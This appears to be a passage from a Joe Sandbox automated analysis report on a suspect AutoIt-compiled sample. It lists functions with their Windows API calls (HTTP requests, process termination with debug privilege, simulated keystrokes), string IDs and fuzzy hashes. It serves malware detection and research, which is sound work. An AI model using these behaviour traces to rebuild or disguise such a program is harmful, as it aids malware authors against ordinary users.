                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00C88CFF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                        • API String ID: 1924731296-2107944366
                                        • Opcode ID: dcfade3d8a34d3214d8d59737cc07d2dc63cc28d7e7f22bf638b4a486953134e
                                        • Instruction ID: a3f1338c31e911b640025a75c0e876773f2a1c27edd3d73e510541d752e9c321
                                        • Opcode Fuzzy Hash: dcfade3d8a34d3214d8d59737cc07d2dc63cc28d7e7f22bf638b4a486953134e
                                        • Instruction Fuzzy Hash: D051AA70104204AFD704EF24DC96FAE77E4FB88754F40062DF996972E2CB70AA08CB66
                                        Function 00C6C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C6C272
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C6C29A
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C6C2CA
                                        • GetLastError.KERNEL32 ref: 00C6C322
                                        • SetEvent.KERNEL32(?), ref: 00C6C336
                                        • InternetCloseHandle.WININET(00000000), ref: 00C6C341
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                        • String ID:
                                        • API String ID: 3113390036-3916222277
                                        • Opcode ID: f454c66824c2f7989d3177e3469812711ac50874a35e3e20954c83299b905eb1
                                        • Instruction ID: c190248cdba041b541bc105011a2992bbb28560482fb52d9787014bb79b14f62
                                        • Opcode Fuzzy Hash: f454c66824c2f7989d3177e3469812711ac50874a35e3e20954c83299b905eb1
                                        • Instruction Fuzzy Hash: 973169B1600608AFD7319FA598C8BBB7BFCEB49744B10852EF496D2210DB34DE049B75
                                        Function 00C5989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00C33AAF,?,?,Bad directive syntax error,00C8CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00C598BC
                                        • LoadStringW.USER32(00000000,?,00C33AAF,?), ref: 00C598C3
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C59987
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: HandleLoadMessageModuleString_wcslen
                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                        • API String ID: 858772685-4153970271
                                        • Opcode ID: 530b1d255059fea2945a1f84dd570f332035304a9f9a11c9cf1df67227373048
                                        • Instruction ID: dbd1498347e8138c49e5a4143b2587f10bc72e79618b0fac172b48c29959f8e6
                                        • Opcode Fuzzy Hash: 530b1d255059fea2945a1f84dd570f332035304a9f9a11c9cf1df67227373048
                                        • Instruction Fuzzy Hash: 09216D3180021EEBCF11EF90CC46EEE77B5FF18741F0844A9F615620A2EA359658DB24
                                        Function 00C5209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetParent.USER32 ref: 00C520AB
                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00C520C0
                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C5214D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameParentSend
                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                        • API String ID: 1290815626-3381328864
                                        • Opcode ID: 705e9af9db857f6887ddcc30a7de4cdc9535ef7211508bc534a6d20b071250cc
                                        • Instruction ID: 35381ced411041e7b16102a06c192a39e8cab9ab7881aaa883cf2f1e4e4a4d4f
                                        • Opcode Fuzzy Hash: 705e9af9db857f6887ddcc30a7de4cdc9535ef7211508bc534a6d20b071250cc
                                        • Instruction Fuzzy Hash: B211E77A684B06BAF60522219C06EEF37DCCF06325F200026FE05A50D2FA616D85765C
                                        Function 00C2CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                        • String ID:
                                        • API String ID: 1282221369-0
                                        • Opcode ID: 0ea4ad76c75efa471aa9e4b95e87b534c61f96f2ba137ad27374a7c76f17bd8c
                                        • Instruction ID: 4c7a97be5b6ca221421b7c68ef1f8376bd43d32dfb3f0b2f3d47b5fb67df7019
                                        • Opcode Fuzzy Hash: 0ea4ad76c75efa471aa9e4b95e87b534c61f96f2ba137ad27374a7c76f17bd8c
                                        • Instruction Fuzzy Hash: 6E615671904320AFDB21AFF8FDC1B6E7BA5AF05320F14026DF81697A82E7319E419790
                                        Function 00C08B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00C46890
                                        • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00C468A9
                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C468B9
                                        • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00C468D1
                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C468F2
                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00C08874,00000000,00000000,00000000,000000FF,00000000), ref: 00C46901
                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C4691E
                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00C08874,00000000,00000000,00000000,000000FF,00000000), ref: 00C4692D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                        • String ID:
                                        • API String ID: 1268354404-0
                                        • Opcode ID: ce716374a2ca7f7f6af46fa528f42fd1af903442dca89cfb3456b2850a584f7a
                                        • Instruction ID: a976a956d36ec26215d2624354507c164a56d23c7af1600eae055806ca46b547
                                        • Opcode Fuzzy Hash: ce716374a2ca7f7f6af46fa528f42fd1af903442dca89cfb3456b2850a584f7a
                                        • Instruction Fuzzy Hash: 12517870600209EFDB20CF25CC95FAA7BB5FB59760F108528F992972E0DB70EA94DB50
                                        Function 00C6C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C6C182
                                        • GetLastError.KERNEL32 ref: 00C6C195
                                        • SetEvent.KERNEL32(?), ref: 00C6C1A9
                                          • Part of subcall function 00C6C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C6C272
                                          • Part of subcall function 00C6C253: GetLastError.KERNEL32 ref: 00C6C322
                                          • Part of subcall function 00C6C253: SetEvent.KERNEL32(?), ref: 00C6C336
                                          • Part of subcall function 00C6C253: InternetCloseHandle.WININET(00000000), ref: 00C6C341
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                        • String ID:
                                        • API String ID: 337547030-0
                                        • Opcode ID: 0f89c1ace0c2dbe9143c945a64d1627d52c3df5b440ee24fd18ee2defd7b1c5a
                                        • Instruction ID: 4d691ec8f89e512fe6e1bc4cd7fe1cec0d03d321c2a1d0b1aacbb9e66c99e711
                                        • Opcode Fuzzy Hash: 0f89c1ace0c2dbe9143c945a64d1627d52c3df5b440ee24fd18ee2defd7b1c5a
                                        • Instruction Fuzzy Hash: BB315C71600605AFDB319FA5DCD4B7ABBF9FF19300B14842DF9AA82610D735E914ABA0
                                        Function 00C525A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C53A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C53A57
                                          • Part of subcall function 00C53A3D: GetCurrentThreadId.KERNEL32 ref: 00C53A5E
                                          • Part of subcall function 00C53A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C525B3), ref: 00C53A65
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C525BD
                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C525DB
                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00C525DF
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C525E9
                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C52601
                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00C52605
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C5260F
                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C52623
                                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00C52627
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                        • String ID:
                                        • API String ID: 2014098862-0
                                        • Opcode ID: 63a1f5f56e4c59659d0e269bbe26fec6ec58b3216c796a337032a38b9a81f875
                                        • Instruction ID: 7dc5ec650bba27f6092f93b41a4f9e4b1341097757f49853e9fbd3957956805d
                                        • Opcode Fuzzy Hash: 63a1f5f56e4c59659d0e269bbe26fec6ec58b3216c796a337032a38b9a81f875
                                        • Instruction Fuzzy Hash: 5301B131290650BBFB2067699CCEF5D3F99DB4AB52F100011F718AE0D5C9F224889A7D
                                        Function 00C51803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00C51449,?,?,00000000), ref: 00C5180C
                                        • HeapAlloc.KERNEL32(00000000,?,00C51449,?,?,00000000), ref: 00C51813
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C51449,?,?,00000000), ref: 00C51828
                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00C51449,?,?,00000000), ref: 00C51830
                                        • DuplicateHandle.KERNEL32(00000000,?,00C51449,?,?,00000000), ref: 00C51833
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C51449,?,?,00000000), ref: 00C51843
                                        • GetCurrentProcess.KERNEL32(00C51449,00000000,?,00C51449,?,?,00000000), ref: 00C5184B
                                        • DuplicateHandle.KERNEL32(00000000,?,00C51449,?,?,00000000), ref: 00C5184E
                                        • CreateThread.KERNEL32(00000000,00000000,00C51874,00000000,00000000,00000000), ref: 00C51868
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                        • String ID:
                                        • API String ID: 1957940570-0
                                        • Opcode ID: 97a6337d3fb828e47a0ddcdae450b0cb63d5d64a91a3d5beacf1d4f35a00eae9
                                        • Instruction ID: cced73220db8500c0f477401c624e48906ccb75ed007e0ef5060b492ab506eed
                                        • Opcode Fuzzy Hash: 97a6337d3fb828e47a0ddcdae450b0cb63d5d64a91a3d5beacf1d4f35a00eae9
                                        • Instruction Fuzzy Hash: E901A8B5240308BFE610ABA5DCCDF6F3BACEB89B11F014411FA05DB2A1DA719C108B34
                                        Function 00C7A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C5D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00C5D501
                                          • Part of subcall function 00C5D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00C5D50F
                                          • Part of subcall function 00C5D4DC: CloseHandle.KERNEL32(00000000), ref: 00C5D5DC
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C7A16D
                                        • GetLastError.KERNEL32 ref: 00C7A180
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C7A1B3
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C7A268
                                        • GetLastError.KERNEL32(00000000), ref: 00C7A273
                                        • CloseHandle.KERNEL32(00000000), ref: 00C7A2C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                        • String ID: SeDebugPrivilege
                                        • API String ID: 2533919879-2896544425
                                        • Opcode ID: de9a2d7e24b5a5e128df442013688a8d4fd70f49892e8b8a4a043712379b1275
                                        • Instruction ID: c5d3faae3b4bf2e36bcba97d6f983e4c6088be637be96db8f210ce2c05c8f991
                                        • Opcode Fuzzy Hash: de9a2d7e24b5a5e128df442013688a8d4fd70f49892e8b8a4a043712379b1275
                                        • Instruction Fuzzy Hash: 58618E31204242AFD710DF19C494F29BBE1AF84318F54C49CE46A8B7A3C776ED89CB96
                                        Function 00C83886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C83925
                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00C8393A
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C83954
                                        • _wcslen.LIBCMT ref: 00C83999
                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00C839C6
                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C839F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window_wcslen
                                        • String ID: SysListView32
                                        • API String ID: 2147712094-78025650
                                        • Opcode ID: db56b93c514575eeea194c63ba4518c1b78759d29193eff8796ddb8ad9bca318
                                        • Instruction ID: 379a4a7d9a1f43132f8c3ee26b8cf2cba0f39a573f1cec6972c9e0b13ec96c01
                                        • Opcode Fuzzy Hash: db56b93c514575eeea194c63ba4518c1b78759d29193eff8796ddb8ad9bca318
                                        • Instruction Fuzzy Hash: 5741B471A00218ABDF21AF64CC49FEE77A9EF08754F101526F958E7281D771DE84CB94
                                        Function 00C5BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C5BCFD
                                        • IsMenu.USER32(00000000), ref: 00C5BD1D
                                        • CreatePopupMenu.USER32 ref: 00C5BD53
                                        • GetMenuItemCount.USER32(00F16468), ref: 00C5BDA4
                                        • InsertMenuItemW.USER32(00F16468,?,00000001,00000030), ref: 00C5BDCC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                        • String ID: 0$2
                                        • API String ID: 93392585-3793063076
                                        • Opcode ID: 8aeaeb0e4155ec14cfad95719cf270ba448203795566d246548e109db283942d
                                        • Instruction ID: bdae95e3eb2d7996d062f2473d50107a812611284d9d431ea9fd1463ad558ec8
                                        • Opcode Fuzzy Hash: 8aeaeb0e4155ec14cfad95719cf270ba448203795566d246548e109db283942d
                                        • Instruction Fuzzy Hash: 12519F786002099BDF10CFA9D8C4BAEBFF4AF55316F144119FC2197294D770AE88CB69
                                        Function 00C5C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadIconW.USER32(00000000,00007F03), ref: 00C5C913
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: IconLoad
                                        • String ID: blank$info$question$stop$warning
                                        • API String ID: 2457776203-404129466
                                        • Opcode ID: 49e0ddc8f4fd4a894354806fe0c7ce163f9adb87bda2ee44541677cb0c68ddae
                                        • Instruction ID: bdcee9cb4346db4cab40dc48035e8b3840773f341f20586b922940f0baa1b374
                                        • Opcode Fuzzy Hash: 49e0ddc8f4fd4a894354806fe0c7ce163f9adb87bda2ee44541677cb0c68ddae
                                        • Instruction Fuzzy Hash: D6112B3A689306BEA7045B55DCC2DEE679CDF15716B20003AF900A62C2DB745EC4726C
                                        Function 00C5ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _wcslen$LocalTime
                                        • String ID:
                                        • API String ID: 952045576-0
                                        • Opcode ID: 29de0a561e2936079cb176f1468186fe531836fb807ee057e2fb618e96556b31
                                        • Instruction ID: f09dfa13950b7b6f57bc5b5ad3455a6fb8d9daed71c851a9b167b4e070a4e988
                                        • Opcode Fuzzy Hash: 29de0a561e2936079cb176f1468186fe531836fb807ee057e2fb618e96556b31
                                        • Instruction Fuzzy Hash: D5419365C1021875CB15EBF4C88A9CFB7BCAF46710F508462E914E3122FB34E796E3A9
                                        Function 00C0F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                        Download Yara Rule
                                        APIs
                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00C4682C,00000004,00000000,00000000), ref: 00C0F953
                                        • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00C4682C,00000004,00000000,00000000), ref: 00C4F3D1
                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00C4682C,00000004,00000000,00000000), ref: 00C4F454
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
